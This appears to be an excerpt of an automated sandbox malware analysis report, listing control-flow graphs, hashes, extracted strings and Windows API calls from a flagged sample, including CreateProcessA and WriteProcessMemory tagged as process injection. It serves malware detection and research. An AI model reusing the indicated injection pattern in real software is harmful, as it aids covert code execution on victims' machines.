7e7907c-7e79083 1927->1936 1933 7e79063-7e79066 1928->1933 1934 7e79068-7e79075 1928->1934 1937 7e78f63-7e78f66 1929->1937 1938 7e78f60 1929->1938 1930->1909 1941 7e79077 1933->1941 1934->1941 1944 7e79085-7e79097 1936->1944 1945 7e79099 1936->1945 1937->1909 1938->1937 1941->1936 1949 7e78ecd-7e78ed1 1942->1949 1952 7e78eb4-7e78eb7 1943->1952 1953 7e78eb9-7e78ec6 1943->1953 1954 7e7909c-7e790a9 1944->1954 1945->1954 1966 7e78fb7 1946->1966 1967 7e78f9b-7e78fa1 1946->1967 1947->1904 1955 7e79035-7e7903c 1947->1955 1948->1925 1956 7e7903f 1948->1956 1958 7e78ed3-7e78edc 1949->1958 1959 7e78ef2 1949->1959 1957 7e78ec8 1952->1957 1953->1957 1971 7e790c1-7e790c6 1954->1971 1972 7e790ab-7e790b1 1954->1972 1955->1956 1956->1909 1957->1949 1964 7e78ee3-7e78ee6 1958->1964 1965 7e78ede-7e78ee1 1958->1965 1962 7e78ef5-7e78f14 1959->1962 1962->1909 1970 7e78ef0 1964->1970 1965->1970 1973 7e78fb9-7e78fbb 1966->1973 1968 7e78fa7-7e78fb3 1967->1968 1969 7e78fa3-7e78fa5 1967->1969 1974 7e78fb5 1968->1974 1969->1974 1970->1962 1971->1909 1977 7e790b5-7e790b7 1972->1977 1978 7e790b3 1972->1978 1975 7e78fd5-7e78fea 1973->1975 1976 7e78fbd-7e78fc3 1973->1976 1974->1973 1975->1909 1980 7e78fc7-7e78fd3 1976->1980 1981 7e78fc5 1976->1981 1977->1971 1978->1971 1980->1975 1981->1975
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: fcq$ fcq$Te^q$XX^q$$^q$$^q$$^q$$^q
                              • API String ID: 0-3622600923
                              • Opcode ID: 425d070346c81f7857f3a27a92e241b62dacbf81d76d584f668b67f5faf71160
                              • Instruction ID: 25205294881a37575ef39a9008400a1df07f42368cc6aa81685ea018160ab10a
                              • Opcode Fuzzy Hash: 425d070346c81f7857f3a27a92e241b62dacbf81d76d584f668b67f5faf71160
                              • Instruction Fuzzy Hash: E171E1F0E12219CFDB18CBA5C848ABDB7B2FF91715F24995AE5029F295C734AC85CB40
                              Function 07E72C30 Relevance: 7.8, Strings: 6, Instructions: 323COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1986 7e72c30-7e72c5a 1987 7e72c63-7e72c67 1986->1987 1988 7e72c5c 1986->1988 1989 7e72c7e-7e72c99 1987->1989 1990 7e72c69-7e72c6d 1987->1990 1988->1987 1998 7e72ca4-7e72ca8 1989->1998 1999 7e72c9b 1989->1999 1991 7e72c73-7e72c7b 1990->1991 1992 7e72f3e-7e72f49 1990->1992 1991->1989 1997 7e72f50-7e72fb4 1992->1997 2021 7e72fbb-7e7301f 1997->2021 2000 7e72cb3-7e72cd7 1998->2000 2001 7e72caa-7e72cb0 1998->2001 1999->1998 2008 7e72e72-7e72e84 2000->2008 2009 7e72cdd-7e72ce2 2000->2009 2001->2000 2092 7e72e87 call 7e734e7 2008->2092 2093 7e72e87 call 7e73271 2008->2093 2094 7e72e87 call 7e73280 2008->2094 2095 7e72e87 call 7e73399 2008->2095 2090 7e72ce5 call 7e730f9 2009->2090 2091 7e72ce5 call 7e73108 2009->2091 2011 7e72ceb-7e72cef 2011->1997 2014 7e72cf5-7e72cf9 2011->2014 2012 7e72e8d 2015 7e72f2f-7e72f36 2012->2015 2014->1997 2017 7e72cff-7e72d09 2014->2017 2020 7e72d0f-7e72d13 2017->2020 2017->2021 2020->2008 2023 7e72d19-7e72d1d 2020->2023 2054 7e73026-7e7308a 2021->2054 2025 7e72d1f-7e72d26 2023->2025 2026 7e72d2c-7e72d30 2023->2026 2025->2008 2025->2026 2027 7e72d36-7e72d46 2026->2027 2028 7e73091-7e730b3 2026->2028 2032 7e72d76-7e72d7c 2027->2032 2033 7e72d48-7e72d4e 2027->2033 2035 7e730b5-7e730c1 2028->2035 2036 7e730f0 2028->2036 2039 7e72d80-7e72d8c 2032->2039 2040 7e72d7e 2032->2040 2037 7e72d52-7e72d5e 2033->2037 2038 7e72d50 2033->2038 2035->2036 2046 7e730c3-7e730cc 2035->2046 2041 7e730f2-7e730f5 2036->2041 2043 7e72d60-7e72d70 2037->2043 2038->2043 2044 7e72d8e-7e72dac 2039->2044 2040->2044 2043->2032 2043->2054 2044->2008 2052 7e72db2-7e72db4 2044->2052 2046->2036 2058 7e730ce-7e730dc 2046->2058 2055 7e72db6-7e72dca 2052->2055 2056 7e72dcf-7e72dd3 2052->2056 2054->2028 2055->2015 2056->2008 2059 7e72dd9-7e72de3 2056->2059 2058->2036 2065 7e730de-7e730ec 2058->2065 2059->2008 2068 7e72de9-7e72def 2059->2068 2065->2036 2074 7e730ee 2065->2074 2069 7e72df5-7e72df8 2068->2069 2070 7e72f39 2068->2070 2069->2028 2073 7e72dfe-7e72e1b 2069->2073 2070->1992 2080 7e72e1d-7e72e38 2073->2080 2081 7e72e59-7e72e6d 2073->2081 2074->2041 2087 7e72e40-7e72e54 2080->2087 2088 7e72e3a-7e72e3e 2080->2088 2081->2015 2087->2015 2088->2008 2088->2087 2090->2011 2091->2011 2092->2012 2093->2012 2094->2012 2095->2012
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: (o^q$(o^q$,bq$,bq$Hbq$d8cq
                              • API String ID: 0-1626189073
                              • Opcode ID: c527726afb1fc1da6ae662baf1d6aad2f4471bbf5b5d7608f809fbaf4dfb6c40
                              • Instruction ID: 95cee5488c4d41f020cfaf2e46f57d3d3a4d7050cc3e48d8f534850a1f29aa4e
                              • Opcode Fuzzy Hash: c527726afb1fc1da6ae662baf1d6aad2f4471bbf5b5d7608f809fbaf4dfb6c40
                              • Instruction Fuzzy Hash: E6C14871B111198FCB18DF68D958AAE7BBAFF88705F148029E906E73A4DB31DC41CB90
                              Function 07E77E80 Relevance: 3.8, Strings: 3, Instructions: 52COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2382 7e77e80-7e77e94 2383 7e77e99-7e77e9c 2382->2383 2384 7e77ea5-7e77eae 2383->2384 2385 7e77e9e 2383->2385 2386 7e77f04-7e77f0e 2384->2386 2387 7e77eb0-7e77eb7 2384->2387 2385->2384 2388 7e77ed7-7e77ed9 2385->2388 2389 7e77ef5-7e77efa 2385->2389 2390 7e77ee3-7e77ee8 2385->2390 2391 7e77efc-7e77f01 2385->2391 2392 7e77edb 2385->2392 2393 7e77eb9-7e77ec7 2385->2393 2387->2383 2388->2383 2389->2383 2390->2386 2396 7e77eea-7e77ef3 2390->2396 2392->2390 2394 7e77ed0-7e77ed5 2393->2394 2395 7e77ec9 2393->2395 2397 7e77ece 2394->2397 2395->2397 2396->2383 2397->2383
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: LR^q$$^q$$^q
                              • API String ID: 0-3333519130
                              • Opcode ID: 30f82fff96d88816ded2d21b235c7b463ca84331b9da70d6cf4a9a7f952508d3
                              • Instruction ID: b5b97364f89090ea3a6c97f6e00a1f0cec1f4fa87e5e909762c7d6f1f454a0a2
                              • Opcode Fuzzy Hash: 30f82fff96d88816ded2d21b235c7b463ca84331b9da70d6cf4a9a7f952508d3
                              • Instruction Fuzzy Hash: A801FCF221E262DFC31586A6AC007B7FB68EB87316F155967F055C62C1C2389C50C7A6
                              Function 07E77B4C Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2399 7e77b4c 2400 7e77b4d-7e77b52 2399->2400 2401 7e77b5a-7e77b66 2400->2401 2402 7e77b71-7e77b78 2401->2402 2403 7e77b9b 2402->2403 2404 7e77b7a-7e77b83 2402->2404 2407 7e77b9e-7e77c02 2403->2407 2405 7e77b85-7e77b88 2404->2405 2406 7e77b8a-7e77b97 2404->2406 2408 7e77b99 2405->2408 2406->2408 2415 7e77c04-7e77c0a 2407->2415 2416 7e77c1a 2407->2416 2408->2407 2418 7e77c0e-7e77c10 2415->2418 2419 7e77c0c 2415->2419 2417 7e77c1d-7e77c24 2416->2417 2420 7e77c2a-7e77c36 2417->2420 2421 7e77de9-7e77df2 2417->2421 2418->2416 2419->2416 2420->2400 2423 7e77b3d 2420->2423 2423->2399 2423->2400 2423->2417 2425 7e77db1-7e77db6 2423->2425 2426 7e77cde-7e77ce3 2423->2426 2427 7e77c3b-7e77c3f 2423->2427 2428 7e77dbb-7e77dc8 2423->2428 2429 7e77ce8-7e77cfb 2423->2429 2430 7e77c62 2427->2430 2431 7e77c41-7e77c4a 2427->2431 2438 7e77dd0 2428->2438 2472 7e77d00 call 7e7c504 2429->2472 2473 7e77d00 call 7e7c4e4 2429->2473 2474 7e77d00 call 7e7c4f4 2429->2474 2475 7e77d00 call 7e7dc09 2429->2475 2476 7e77d00 call 7e7c478 2429->2476 2477 7e77d00 call 7e7dc98 2429->2477 2432 7e77c65-7e77cc3 2430->2432 2434 7e77c51-7e77c5e 2431->2434 2435 7e77c4c-7e77c4f 2431->2435 2458 7e77cc5-7e77ccb 2432->2458 2459 7e77cdb 2432->2459 2437 7e77c60 2434->2437 2435->2437 2437->2432 2468 7e77dd2 call 7e7f021 2438->2468 2469 7e77dd2 call 7e7f030 2438->2469 2440 7e77d06 2470 7e77d08 call 7e7e5a8 2440->2470 2471 7e77d08 call 7e7e5b8 2440->2471 2442 7e77dd8 2448 7e77ddf-7e77de6 2442->2448 2444 7e77d0e-7e77d15 2445 7e77d17-7e77d20 2444->2445 2446 7e77d38 2444->2446 2450 7e77d27-7e77d34 2445->2450 2451 7e77d22-7e77d25 2445->2451 2447 7e77d3b-7e77d84 2446->2447 2465 7e77d8e-7e77d9c 2447->2465 2452 7e77d36 2450->2452 2451->2452 2452->2447 2460 7e77ccf-7e77cd1 2458->2460 2461 7e77ccd 2458->2461 2459->2426 2460->2459 2461->2459 2466 7e77da2-7e77dae 2465->2466 2466->2425 2468->2442 2469->2442 2470->2444 2471->2444 2472->2440 2473->2440 2474->2440 2475->2440 2476->2440 2477->2440
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: $^q$$^q
                              • API String ID: 0-355816377
                              • Opcode ID: ace8ad12b79b84ec68e171ce24fa9bea427804b6d552271cc8a394f057c8fb7e
                              • Instruction ID: 9d231407de3522ba572c9a1a4cf861e9008a08b397b9f2279d52dd93a8acff52
                              • Opcode Fuzzy Hash: ace8ad12b79b84ec68e171ce24fa9bea427804b6d552271cc8a394f057c8fb7e
                              • Instruction Fuzzy Hash: 2C51D470B01208DFDB148B78D858BAD7BB3BB89B11F209424F542BB394DE709C81CB90
                              Function 07E77B33 Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2478 7e77b33 2479 7e77b38-7e77b3b 2478->2479 2480 7e77b4d-7e77b52 2479->2480 2481 7e77b3d 2479->2481 2493 7e77b5a-7e77b66 2480->2493 2481->2480 2482 7e77db1-7e77db6 2481->2482 2483 7e77cde-7e77ce3 2481->2483 2484 7e77c1d-7e77c24 2481->2484 2485 7e77b4c 2481->2485 2486 7e77c3b-7e77c3f 2481->2486 2487 7e77dbb-7e77dc8 2481->2487 2488 7e77ce8-7e77cfb 2481->2488 2489 7e77c2a-7e77c36 2484->2489 2490 7e77de9-7e77df2 2484->2490 2485->2480 2491 7e77c62 2486->2491 2492 7e77c41-7e77c4a 2486->2492 2502 7e77dd0 2487->2502 2552 7e77d00 call 7e7c504 2488->2552 2553 7e77d00 call 7e7c4e4 2488->2553 2554 7e77d00 call 7e7c4f4 2488->2554 2555 7e77d00 call 7e7dc09 2488->2555 2556 7e77d00 call 7e7c478 2488->2556 2557 7e77d00 call 7e7dc98 2488->2557 2489->2479 2494 7e77c65-7e77cc3 2491->2494 2496 7e77c51-7e77c5e 2492->2496 2497 7e77c4c-7e77c4f 2492->2497 2501 7e77b71-7e77b78 2493->2501 2532 7e77cc5-7e77ccb 2494->2532 2533 7e77cdb 2494->2533 2499 7e77c60 2496->2499 2497->2499 2499->2494 2506 7e77b9b 2501->2506 2507 7e77b7a-7e77b83 2501->2507 2548 7e77dd2 call 7e7f021 2502->2548 2549 7e77dd2 call 7e7f030 2502->2549 2504 7e77d06 2550 7e77d08 call 7e7e5a8 2504->2550 2551 7e77d08 call 7e7e5b8 2504->2551 2510 7e77b9e-7e77c02 2506->2510 2508 7e77b85-7e77b88 2507->2508 2509 7e77b8a-7e77b97 2507->2509 2511 7e77b99 2508->2511 2509->2511 2540 7e77c04-7e77c0a 2510->2540 2541 7e77c1a 2510->2541 2511->2510 2512 7e77dd8 2520 7e77ddf-7e77de6 2512->2520 2514 7e77d0e-7e77d15 2517 7e77d17-7e77d20 2514->2517 2518 7e77d38 2514->2518 2522 7e77d27-7e77d34 2517->2522 2523 7e77d22-7e77d25 2517->2523 2519 7e77d3b-7e77d84 2518->2519 2545 7e77d8e-7e77d9c 2519->2545 2525 7e77d36 2522->2525 2523->2525 2525->2519 2535 7e77ccf-7e77cd1 2532->2535 2536 7e77ccd 2532->2536 2533->2483 2535->2533 2536->2533 2542 7e77c0e-7e77c10 2540->2542 2543 7e77c0c 2540->2543 2541->2484 2542->2541 2543->2541 2546 7e77da2-7e77dae 2545->2546 2546->2482 2548->2512 2549->2512 2550->2514 2551->2514 2552->2504 2553->2504 2554->2504 2555->2504 2556->2504 2557->2504
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: $^q$$^q
                              • API String ID: 0-355816377
                              • Opcode ID: b6a17737d1d140feadc02f589565ecc8e7a4b93d8b717b0fc8c195a8778a1125
                              • Instruction ID: 209bb381ca184bb3c6b7fae3fce2cf12827d0e3f151d3c03c1aa3e9bda1687cc
                              • Opcode Fuzzy Hash: b6a17737d1d140feadc02f589565ecc8e7a4b93d8b717b0fc8c195a8778a1125
                              • Instruction Fuzzy Hash: CB51B170B15208DFDB189B78D858BAD7BB3BB89B11F209425E542BB394DE749C81CB90
                              Function 07E72C00 Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2558 7e72c00-7e72c5a 2561 7e72c63-7e72c67 2558->2561 2562 7e72c5c 2558->2562 2563 7e72c7e-7e72c99 2561->2563 2564 7e72c69-7e72c6d 2561->2564 2562->2561 2572 7e72ca4-7e72ca8 2563->2572 2573 7e72c9b 2563->2573 2565 7e72c73-7e72c7b 2564->2565 2566 7e72f3e-7e72f49 2564->2566 2565->2563 2571 7e72f50-7e72fb4 2566->2571 2595 7e72fbb-7e7301f 2571->2595 2574 7e72cb3-7e72cd7 2572->2574 2575 7e72caa-7e72cb0 2572->2575 2573->2572 2582 7e72e72-7e72e84 2574->2582 2583 7e72cdd-7e72ce2 2574->2583 2575->2574 2666 7e72e87 call 7e734e7 2582->2666 2667 7e72e87 call 7e73271 2582->2667 2668 7e72e87 call 7e73280 2582->2668 2669 7e72e87 call 7e73399 2582->2669 2664 7e72ce5 call 7e730f9 2583->2664 2665 7e72ce5 call 7e73108 2583->2665 2585 7e72ceb-7e72cef 2585->2571 2588 7e72cf5-7e72cf9 2585->2588 2586 7e72e8d 2589 7e72f2f-7e72f36 2586->2589 2588->2571 2591 7e72cff-7e72d09 2588->2591 2594 7e72d0f-7e72d13 2591->2594 2591->2595 2594->2582 2597 7e72d19-7e72d1d 2594->2597 2628 7e73026-7e7308a 2595->2628 2599 7e72d1f-7e72d26 2597->2599 2600 7e72d2c-7e72d30 2597->2600 2599->2582 2599->2600 2601 7e72d36-7e72d46 2600->2601 2602 7e73091-7e730b3 2600->2602 2606 7e72d76-7e72d7c 2601->2606 2607 7e72d48-7e72d4e 2601->2607 2609 7e730b5-7e730c1 2602->2609 2610 7e730f0 2602->2610 2613 7e72d80-7e72d8c 2606->2613 2614 7e72d7e 2606->2614 2611 7e72d52-7e72d5e 2607->2611 2612 7e72d50 2607->2612 2609->2610 2620 7e730c3-7e730cc 2609->2620 2615 7e730f2-7e730f5 2610->2615 2617 7e72d60-7e72d70 2611->2617 2612->2617 2618 7e72d8e-7e72dac 2613->2618 2614->2618 2617->2606 2617->2628 2618->2582 2626 7e72db2-7e72db4 2618->2626 2620->2610 2632 7e730ce-7e730dc 2620->2632 2629 7e72db6-7e72dca 2626->2629 2630 7e72dcf-7e72dd3 2626->2630 2628->2602 2629->2589 2630->2582 2633 7e72dd9-7e72de3 2630->2633 2632->2610 2639 7e730de-7e730ec 2632->2639 2633->2582 2642 7e72de9-7e72def 2633->2642 2639->2610 2648 7e730ee 2639->2648 2643 7e72df5-7e72df8 2642->2643 2644 7e72f39 2642->2644 2643->2602 2647 7e72dfe-7e72e1b 2643->2647 2644->2566 2654 7e72e1d-7e72e38 2647->2654 2655 7e72e59-7e72e6d 2647->2655 2648->2615 2661 7e72e40-7e72e54 2654->2661 2662 7e72e3a-7e72e3e 2654->2662 2655->2589 2661->2589 2662->2582 2662->2661 2664->2585 2665->2585 2666->2586 2667->2586 2668->2586 2669->2586
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: (o^q$,bq
                              • API String ID: 0-3021502629
                              • Opcode ID: efccca53fdedabab19ff2088054e3ff52787ae3879d9b23725f8601b4444298e
                              • Instruction ID: 5cdd44ae4d7264865ff117ce015432065c19302113da4aa952a086ea5f3e4e80
                              • Opcode Fuzzy Hash: efccca53fdedabab19ff2088054e3ff52787ae3879d9b23725f8601b4444298e
                              • Instruction Fuzzy Hash: 41513B71A1221A8FCB24CF68D988A9EBBF5FF48719F149069E945E7360D7309884CB90
                              Function 08127664 Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2692 8127664-8127705 2695 8127707-8127711 2692->2695 2696 812773e-812775e 2692->2696 2695->2696 2697 8127713-8127715 2695->2697 2701 8127760-812776a 2696->2701 2702 8127797-81277c6 2696->2702 2699 8127717-8127721 2697->2699 2700 8127738-812773b 2697->2700 2703 8127723 2699->2703 2704 8127725-8127734 2699->2704 2700->2696 2701->2702 2705 812776c-812776e 2701->2705 2712 81277c8-81277d2 2702->2712 2713 81277ff-81278b9 CreateProcessA 2702->2713 2703->2704 2704->2704 2706 8127736 2704->2706 2707 8127770-812777a 2705->2707 2708 8127791-8127794 2705->2708 2706->2700 2710 812777e-812778d 2707->2710 2711 812777c 2707->2711 2708->2702 2710->2710 2714 812778f 2710->2714 2711->2710 2712->2713 2715 81277d4-81277d6 2712->2715 2724 81278c2-8127948 2713->2724 2725 81278bb-81278c1 2713->2725 2714->2708 2717 81277d8-81277e2 2715->2717 2718 81277f9-81277fc 2715->2718 2719 81277e6-81277f5 2717->2719 2720 81277e4 2717->2720 2718->2713 2719->2719 2721 81277f7 2719->2721 2720->2719 2721->2718 2735 812794a-812794e 2724->2735 2736 8127958-812795c 2724->2736 2725->2724 2735->2736 2737 8127950 2735->2737 2738 812795e-8127962 2736->2738 2739 812796c-8127970 2736->2739 2737->2736 2738->2739 2740 8127964 2738->2740 2741 8127972-8127976 2739->2741 2742 8127980-8127984 2739->2742 2740->2739 2741->2742 2743 8127978 2741->2743 2744 8127996-812799d 2742->2744 2745 8127986-812798c 2742->2745 2743->2742 2746 81279b4 2744->2746 2747 812799f-81279ae 2744->2747 2745->2744 2749 81279b5 2746->2749 2747->2746 2749->2749
                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 081278A6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: 44f4adfe00fb63ac5f047fa29cf13e5daf33eae4cb9ee80adf9ffa7349796474
                              • Instruction ID: 249a6ef7b3aee4c35e7b8ce7c15b568c3398375af0949f0eef4892622fb7e53d
                              • Opcode Fuzzy Hash: 44f4adfe00fb63ac5f047fa29cf13e5daf33eae4cb9ee80adf9ffa7349796474
                              • Instruction Fuzzy Hash: C0917A71D0122ACFDF10CF68C845BEEBBB2BF48315F1485A9E848A7290DB749995CF91
                              Function 08127670 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2750 8127670-8127705 2752 8127707-8127711 2750->2752 2753 812773e-812775e 2750->2753 2752->2753 2754 8127713-8127715 2752->2754 2758 8127760-812776a 2753->2758 2759 8127797-81277c6 2753->2759 2756 8127717-8127721 2754->2756 2757 8127738-812773b 2754->2757 2760 8127723 2756->2760 2761 8127725-8127734 2756->2761 2757->2753 2758->2759 2762 812776c-812776e 2758->2762 2769 81277c8-81277d2 2759->2769 2770 81277ff-81278b9 CreateProcessA 2759->2770 2760->2761 2761->2761 2763 8127736 2761->2763 2764 8127770-812777a 2762->2764 2765 8127791-8127794 2762->2765 2763->2757 2767 812777e-812778d 2764->2767 2768 812777c 2764->2768 2765->2759 2767->2767 2771 812778f 2767->2771 2768->2767 2769->2770 2772 81277d4-81277d6 2769->2772 2781 81278c2-8127948 2770->2781 2782 81278bb-81278c1 2770->2782 2771->2765 2774 81277d8-81277e2 2772->2774 2775 81277f9-81277fc 2772->2775 2776 81277e6-81277f5 2774->2776 2777 81277e4 2774->2777 2775->2770 2776->2776 2778 81277f7 2776->2778 2777->2776 2778->2775 2792 812794a-812794e 2781->2792 2793 8127958-812795c 2781->2793 2782->2781 2792->2793 2794 8127950 2792->2794 2795 812795e-8127962 2793->2795 2796 812796c-8127970 2793->2796 2794->2793 2795->2796 2797 8127964 2795->2797 2798 8127972-8127976 2796->2798 2799 8127980-8127984 2796->2799 2797->2796 2798->2799 2800 8127978 2798->2800 2801 8127996-812799d 2799->2801 2802 8127986-812798c 2799->2802 2800->2799 2803 81279b4 2801->2803 2804 812799f-81279ae 2801->2804 2802->2801 2806 81279b5 2803->2806 2804->2803 2806->2806
                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 081278A6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: 6ae23461bbd28e263b5f787b382ca008aa19924d91166c9ca8f95fb2f96db14e
                              • Instruction ID: 5b792f899e95ff2f672dfcc99ee591c9402063a6561f59d68f1fe8244a4f735f
                              • Opcode Fuzzy Hash: 6ae23461bbd28e263b5f787b382ca008aa19924d91166c9ca8f95fb2f96db14e
                              • Instruction Fuzzy Hash: 23916B71D0122ACFDF10CF68C845BEEBBB2BF48315F1485A9E848A7280DB749995CF91
                              Function 0133B2BF Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0133B526
                              Memory Dump Source
                              • Source File: 00000000.00000002.1783197659.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: ddf4a7cfd4d08517a373c011d4f212c2668b225d62a8cbdb60390a7492bcf095
                              • Instruction ID: a7fe719a5f4a2d884e6a6fba751b8b731f8d157a7e067f02f7d78cd5b1142e39
                              • Opcode Fuzzy Hash: ddf4a7cfd4d08517a373c011d4f212c2668b225d62a8cbdb60390a7492bcf095
                              • Instruction Fuzzy Hash: F28136B0A00B058FD724DF29D54079ABBF1FF88318F00892DD48ADBA54DB74E949CB95
                              Function 01335F64 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                              Download Yara Rule
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 01336021
                              Memory Dump Source
                              • Source File: 00000000.00000002.1783197659.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 6b9e510ec21fce6263015113e492f103588f63ccde557a13a4f03719bff0e4b4
                              • Instruction ID: 0448d7f1b63f0ef0173f4828cc416a7d0ff4325ccfff9f66fce45c9aa1e0d839
                              • Opcode Fuzzy Hash: 6b9e510ec21fce6263015113e492f103588f63ccde557a13a4f03719bff0e4b4
                              • Instruction Fuzzy Hash: 944103B1C00619CEDB24CFA9C9497DDFBF5BF84308F24805AD408AB251D7755989CF94
                              Function 01334B3C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                              Download Yara Rule
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 01336021
                              Memory Dump Source
                              • Source File: 00000000.00000002.1783197659.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 2621c56ccfd0eba67f303c317344ae47c782f799c03f0a843a328d0424e62ca9
                              • Instruction ID: 7cab32fa929062131d24d6cea6260587aeac36beb9663d1d2e39120a00ec6b2a
                              • Opcode Fuzzy Hash: 2621c56ccfd0eba67f303c317344ae47c782f799c03f0a843a328d0424e62ca9
                              • Instruction Fuzzy Hash: 8C41F1B0C04619DFDB24CFA9C845BDDFBB5BF88308F2080AAD408AB255DB756985CF94
                              Function 081273E1 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                              Download Yara Rule
                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08127478
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: f06d285922eb9d447064b85137a5079925e60cb4425238365d9cc4ec298662e0
                              • Instruction ID: 3913b5ce1f061a6287e6529827cad94d973884ba5874422bdc01b3879be1a3f6
                              • Opcode Fuzzy Hash: f06d285922eb9d447064b85137a5079925e60cb4425238365d9cc4ec298662e0
                              • Instruction Fuzzy Hash: A82144B19003599FCB10CFA9C880BDEBFF1FF48320F10842AE958A7251D778A954CBA5
                              Function 081273E8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                              Download Yara Rule
                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08127478
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: 7945f3f0dd16e7657859fbecbe48f28a82464f0a989dca1a3c5703ed5f6461e9
                              • Instruction ID: fdb8cc1459b414c7bb0b936b52bd9655c742bfacf5a6494b229a1306d1d215f8
                              • Opcode Fuzzy Hash: 7945f3f0dd16e7657859fbecbe48f28a82464f0a989dca1a3c5703ed5f6461e9
